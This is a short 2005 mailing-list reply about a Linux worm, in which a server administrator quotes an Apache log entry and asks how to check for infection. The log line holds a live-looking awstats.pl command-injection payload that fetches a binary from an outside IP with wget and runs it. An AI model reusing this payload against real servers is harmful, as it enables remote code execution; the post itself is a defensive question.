Re: New Linux worm crawls the web
Hugo Vanwoerkom wrote:
> Mike McCarty wrote:
>
>> http://www.securityfocus.com/brief/38?ref=rss
>>
>>
>
> How to detect whether infection has occurred?
>
> H
>
>
I got the following log in my apache access.log which I'm concerned about:
208.234.0.44 - - [08/Nov/2005:10:01:03 -0500] "GET
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 200 780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
This was the only log which gave the client a 200 reply. I didn't find
anything on my /tmp and nothing was listening to the UDP ports 7111 or
7222. My awstats version is 6.4-2 which people say should be patched up
to be unvulnerable to this attack.
How do I make sure that my machine is not infected and serving someone
else now?
Thanks,
/KS
Reply to: